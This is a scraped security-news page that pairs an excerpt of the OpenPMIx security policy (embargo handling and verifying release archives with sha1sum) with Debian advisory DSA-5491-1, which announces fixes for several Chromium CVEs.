    At this point, the embargo will be lifted and a general announcement (including email to the PMIx mailing lists) of the problem and availability of the solution will be made. All users will be urged to update as quickly as possible. All vulnerable releases will be removed from the GitHub release pages, though the tags corresponding to those releases will be retained for historical purposes.
    

**14.2. Software Authenticity and Integrity**

Authenticity and integrity of PMIx software should always be confirmed by computing the checksum of the archive and comparing it with the value listed on the GitHub release page. Assuming you downloaded the file pmix-4.2.2.tar.bz2, you can run the sha1sum command like this:

shell$ sha1sum pmix-4.2.2.tar.bz2

Check that the output matches what is printed in the release announcement, which may look like this:

b4e1cb79dfd94c1b9db8eaba02f725c07ef9df2b  pmix-4.2.2.tar.bz2

To avoid having to manually compare the string, you may use the sha1sum -c parameter as follows:

echo 'b4e1cb79dfd94c1b9db8eaba02f725c07ef9df2b  pmix-4.2.2.tar.bz2'|sha1sum \-c

CVE-2023-41915: 14. OpenPMIx Security Policy — OpenPMIx latest documentation

Debian Linux Security Advisory 5491-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5491-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 07, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-4761 CVE-2023-4762 CVE-2023-4763 CVE-2023-4764Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the oldstable distribution (bullseye), these problems have been fixedin version 116.0.5845.180-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 116.0.5845.180-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmT6DCoACgkQEMKTtsN8TjZj4g//RO4rAcJZYRRBGN+T3PnG10PrE8GMM3kdteUkPz6UbVHoO2MLS2JJ6DvyujUogqtg17utwkPYDmJhXuyd4C5IaM7NM2KOcfSgiQ0roEA1G01lqVT8B6tf6WzQYUKqGepU/c18cbsDsZx5heHEBB/hkS79HBOcyVhPvRHKldYS9NDXY4HbaXedOrwqgGmchV+i4ydxeZqzr8q9LmIAl2fX1vNrh8xZj8PC2eYBsTci5gnBZWnNbzqTnISL84CD4UhWeYgA6GvYEr+KEwFWqnM1aD0qqU5MbiKWeF3Gsz2Lbyu5QWFQQkDU4ewpfK73pMamCOeNDId19olP4hgXP/Oihr/gRyNm3TOzgODuQUJfwhaGUGHv/I5R1ddVvoGRY9j7j7JhqEyn7IHdeJTKiFjAFfuMzuo+a2No9470bSRh97G7HTSNrekHR73xH7qfm5IvG1NAPWiMmXv/vDD2uckg7rpFZ0ifNjpMrgLSB+z1w5BZECQ5k9R1dKg78cO8+HaEnPoArYyQ/BAIB4Fl/VJQAXVteB7AR73saMIrz2OMh5OjbJzydQoT3yrlX1qr85MS/EZTqUXpOQJXcteGNllELOOAQxDxUr9RDO6oH/5EUUXcITsw+QF9x8KpzUeu8CywCCgMlLVYYTQbPmzWhdiEm5AmyzBud3YP9u3KF3RXmkw==PtxI-----END PGP SIGNATURE-----

Tag

#debian